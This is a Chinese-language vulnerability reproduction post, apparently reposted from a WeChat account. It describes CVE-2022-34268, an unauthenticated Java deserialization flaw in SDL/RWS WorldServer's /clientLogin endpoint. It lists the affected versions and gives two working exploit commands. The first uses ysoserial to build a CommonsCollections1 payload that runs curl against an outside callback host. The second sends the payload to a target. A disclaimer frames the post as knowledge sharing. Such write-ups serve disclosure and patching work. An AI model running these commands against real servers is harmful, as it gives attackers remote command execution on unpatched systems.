[漏洞复现] CVE-2022-34268 SDL WroldServer 反序列化RCE

admin 2023年12月27日09:39:49评论46 views字数 812阅读2分42秒阅读模式

本人非原创漏洞作者,文章仅作为知识分享用

一切直接或间接由于本文所造成的后果与本人无关

如有侵权,联系删除

产品简介

SDL WorldServer 翻译流程管理系统专为本地化项目经理及其团队而设计,用于集中管理、自动化和控制大量的翻译项目,以提供按时、按预算的高质量翻译交付。企业团队可在整个组织内重新获得翻译控制权,并可与多个外部翻译供应商(LSP)高效协作。目前支持许多全球知名品牌的翻译流程,成功简化并加快了其内容从网站到文档到软件的本地化流程。

开发语言:Java官网地址:https://www.rws.com/cn/

[漏洞复现] CVE-2022-34268 SDL WroldServer 反序列化RCE
空间测绘

回复“CVE-2022-34268”获取空间测绘语句

漏洞描述
在 11.7.3 之前的 RWS WorldServer 中发现了一个问题。/clientLogin 在没有身份验证的情况下反序列化 Java 对象,从而导致在主机上执行命令。
影响版本

SDL WorldServer ≤ 11.7.2.243

漏洞利用
1.使用ysoserial生成序列化数据

java -jar ysoserial-all.jar CommonsCollections1 "curl 97c2a13451.ipv6.1433.eu.org" > poc.bin

2.向目标发送序列化数据

curl --data-binary @poc.bin http://xxx.xxx.xxx/ws-legacy/clientLogin -H "Content-Type: application/x-java-serialized-object"

参考链接

https://nvd.nist.gov/vuln/detail/CVE-2022-34268https://www.triskelelabs.com/vulnerabilities-in-rws-worldserver

原文始发于微信公众号(不够安全):[漏洞复现] CVE-2022-34268 SDL WroldServer 反序列化RCE

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月27日09:39:49
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   [漏洞复现] CVE-2022-34268 SDL WroldServer 反序列化RCEhttps://cn-sec.com/archives/2338862.html

发表评论

匿名网友 填写信息